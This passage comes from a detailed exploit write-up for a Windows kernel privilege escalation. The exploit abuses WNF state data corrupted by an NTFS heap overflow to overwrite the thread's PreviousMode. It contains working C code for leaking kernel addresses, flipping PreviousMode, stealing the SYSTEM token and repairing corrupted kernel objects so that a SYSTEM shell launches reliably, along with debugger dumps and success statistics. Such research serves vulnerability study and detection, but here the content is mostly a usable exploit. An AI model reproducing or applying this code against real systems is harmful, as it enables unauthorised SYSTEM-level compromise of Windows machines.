    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead, which is the head of a doubly linked list of the process's _KTHREAD structures (linked through their ThreadListEntry members).

If the exploit only has one thread, then the Flink will point at the ThreadListEntry within our exploit thread's _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD by subtracting 0x2F8, i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this is correct (and see that we hit our breakpoint from the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread. 


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE to just before the _KPROCESS ThreadListHead Flink, we can leak out the Flink value by confusing it with the DataSize and ChangeTimestamp fields: after querying the object, we can reconstruct it as FLINK = ((uintptr_t)ChangeTimestamp << 32) | DataSize.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.
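A minimal sketch of this leak, reusing the pNtQueryWnfStateData pointer and the target name from the earlier sketches, and assuming the query hands the fake DataSize back through its BufferSize parameter when the supplied buffer is too small:

// target_name: the WNF state name whose StateData pointer has been redirected
// to just before _KPROCESS.ThreadListHead, so Flink now overlaps the fake
// DataSize and ChangeStamp fields.
ULONG changeStamp = 0;
ULONG dataSize = 0;
pNtQueryWnfStateData(&target_name, NULL, NULL, &changeStamp, NULL, &dataSize);

ULONG64 flink   = ((ULONG64)changeStamp << 32) | dataSize;  // reassemble ThreadListHead.Flink
ULONG64 kthread = flink - 0x2F8;                            // ThreadListEntry offset in _KTHREAD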

Once we have the address of the _KTHREAD, we again need to find a sane value to confuse with the AllocatedSize and DataSize, to allow reading and writing of the PreviousMode value at offset 0x232.

In this case, we point it at the following location within the _KTHREAD:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  "???"

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
+ 0x000 Header           : _WNF_NODE_HEADER
+ 0x004 AllocatedSize : 0xffff900f
+ 0x008 DataSize : 3
+ 0x00c ChangeStamp : 0

This allows the most significant 32 bits of the Process pointer shown above to be used as the AllocatedSize, and the UserAffinity to act as the DataSize. Incidentally, we can actually influence the value used for the DataSize using SetProcessAffinityMask or by launching the process with start /affinity exploit.exe, but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3-byte read (and up to 0xffff900f bytes of write if needed – but we only need 3 bytes), which includes PreviousMode (i.e. set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant 32 bits of the pointer, which will always be a kernel-mode address, should ensure that the AllocatedSize is large enough to enable overwriting PreviousMode.
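A short sketch of the PreviousMode overwrite itself (again assuming the pNtUpdateWnfStateData pointer from the earlier sketches, and that StateData now points at KTHREAD+0x220 as shown above, so the data region starts at KTHREAD+0x230):

// The third byte of the data region lands on PreviousMode (KTHREAD+0x232);
// the first two bytes are written back as the zeroes observed in the read above.
unsigned char previous_mode_off[3] = { 0x00, 0x00, 0x00 };
pNtUpdateWnfStateData(&target_name, previous_mode_off, sizeof(previous_mode_off),
                      NULL, NULL, 0, 0);

// PreviousMode is later restored to 1 (e.g. via NtWriteVirtualMemory, see the
// PreviousMode Restoration section) before spawning the shell.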

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful primitive and demonstrates the value of moving from an awkward-to-use arbitrary read/write to a method which enables easier post exploitation and enhanced clean-up options.

It is then trivial to walk ActiveProcessLinks within the _EPROCESS, obtain a pointer to a SYSTEM token and replace the existing process token with it, or to perform the escalation by overwriting the _SEP_TOKEN_PRIVILEGES of the existing token, using techniques which have long been used by Windows exploits.
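As a rough sketch of the token stealing route using the now-unconstrained APIs: the _EPROCESS offsets below (UniqueProcessId 0x440, ActiveProcessLinks 0x448, Token 0x4b8) are assumptions for the 20H2 build used here and must be verified per target, the helper names are illustrative, and the sketch assumes the same includes as the earlier ones plus linking against ntdll.lib (or resolving the routines at runtime):

// NtReadVirtualMemory/NtWriteVirtualMemory are exported by ntdll but not
// declared in the SDK headers.
NTSTATUS NTAPI NtReadVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress,
                                   PVOID Buffer, SIZE_T Size, PSIZE_T Returned);
NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress,
                                    PVOID Buffer, SIZE_T Size, PSIZE_T Returned);

// Assumed _EPROCESS offsets for the tested build - verify against the symbols.
#define EPROCESS_UNIQUE_PID   0x440
#define EPROCESS_ACTIVE_LINKS 0x448
#define EPROCESS_TOKEN        0x4B8

ULONG64 kread64(ULONG64 addr)
{
    ULONG64 val = 0;
    // With PreviousMode == KernelMode the kernel address is not validated.
    NtReadVirtualMemory(GetCurrentProcess(), (PVOID)addr, &val, sizeof(val), NULL);
    return val;
}

void kwrite64(ULONG64 addr, ULONG64 val)
{
    NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)addr, &val, sizeof(val), NULL);
}

void StealSystemToken(ULONG64 current_eprocess)
{
    // Walk ActiveProcessLinks until we find the System process (PID 4).
    ULONG64 start = current_eprocess + EPROCESS_ACTIVE_LINKS;
    ULONG64 entry = start;
    ULONG64 system_eprocess = 0;

    do {
        ULONG64 candidate = entry - EPROCESS_ACTIVE_LINKS;
        if (kread64(candidate + EPROCESS_UNIQUE_PID) == 4) {
            system_eprocess = candidate;
            break;
        }
        entry = kread64(entry);   // follow the Flink
    } while (entry != start);

    // Token is an EX_FAST_REF; copying the raw value across is the classic
    // proof of concept shortcut.
    if (system_eprocess)
        kwrite64(current_eprocess + EPROCESS_TOKEN,
                 kread64(system_eprocess + EPROCESS_TOKEN));
}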

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit, but due to the potentially large number of memory writes needed for exploit success, it could leave the kernel in a bad state. Also, when the process terminates, certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers, but is often the most challenging part for use in real-world scenarios (red teams, simulated attacks etc.) where stability and reliability are important. Going through this process also helps us understand how these types of attacks can be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM whilst PreviousMode is still set to 0, we end up with the following crash:

```
Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
```

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory APIs to restore the PreviousMode value to 1 before launching the cmd.exe shell.

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is freed when the _WNF_NAME_INSTANCE is freed on process termination (incidentally, this is also an arbitrary free). If it is not restored to its original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, since we now have arbitrary read and write via the APIs we can instead implement a function which uses a previously saved ScopeInstance pointer to look up the address of our targeted _WNF_NAME_INSTANCE object by its StateName.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    // TreeLinks sits at offset 0x10 within the _WNF_NAME_INSTANCE, so stepping
    // back two QWORDs from the node pointer gives the start of the object.
    return (QWORD*)((QWORD*)i - 2);
}

Once we have obtained our _WNF_NAME_INSTANCE, we can then restore the original StateData pointer.

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted the RunRef member of many _WNF_NAME_INSTANCEs in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see, there is a member TemporaryNamesListHead, which is a linked list connecting the TemporaryNameListEntry members of the _WNF_NAME_INSTANCEs created by the process.

Therefore, we can calculate the address of each _WNF_NAME_INSTANCE by iterating through this linked list using our arbitrary read primitive.

We can then determine if the Header or RunRef has been corrupted and restore each to a sane value which does not cause a BSOD (the original header value and a RunRef of 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // ptr points at the TemporaryNameListEntry (+0x088), so subtracting
        // 17 QWORDs (0x88 bytes) gives the start of the _WNF_NAME_INSTANCE.
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn't actually needed by the exploit, I had the need to obtain the NTOSKRNL base address to speed up some examination and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into a wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset, we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14
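A rough sketch of how that walk could be implemented with the arbitrary read (reusing the kread64 helper from the token sketch above). Everything here is an assumption to verify per build: _KTHREAD.InitialStack at 0x28, the saved kernel stack pointer _KTHREAD.KernelStack at 0x58, and known_ret_offset being the build-specific offset from the ntoskrnl base of a return address expected on a waiting thread's kernel stack:

#define KTHREAD_INITIAL_STACK 0x28   // assumed offset on the tested build
#define KTHREAD_KERNEL_STACK  0x58   // assumed offset of the saved RSP whilst waiting

ULONG64 FindNtoskrnlBase(ULONG64 kthread, ULONG64 known_ret_offset)
{
    // The target thread must be sat in a wait (as in the !thread output above)
    // so that KernelStack holds its saved stack pointer.
    ULONG64 stack_top = kread64(kthread + KTHREAD_INITIAL_STACK);
    ULONG64 saved_rsp = kread64(kthread + KTHREAD_KERNEL_STACK);

    for (ULONG64 p = saved_rsp; p < stack_top; p += 8) {
        ULONG64 value = kread64(p);

        // Cheap filter: a kernel-mode pointer whose page offset matches the
        // known return site.
        if (value < 0xFFFF800000000000ULL ||
            (value & 0xFFF) != (known_ret_offset & 0xFFF))
            continue;

        ULONG64 candidate = value - known_ret_offset;
        // Confirm the candidate base really starts with an 'MZ' header.
        if ((kread64(candidate) & 0xFFFF) == 0x5A4D)
            return candidate;
    }
    return 0;
}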

Exploit Testing and Statistics

As there are some non-deterministic elements and some instability to this exploit, an exploit testing framework was developed to determine its effectiveness across multiple runs, on multiple supported platforms, and while varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with other third-party drivers installed and a noisier kernel pool, it gives some indication that the approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All of these are measured over 100 iterations of the exploit (over 5 runs), with a timeout duration of 15 seconds (i.e. a run counts as successful if a BSOD did not occur within 15 seconds of executing the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

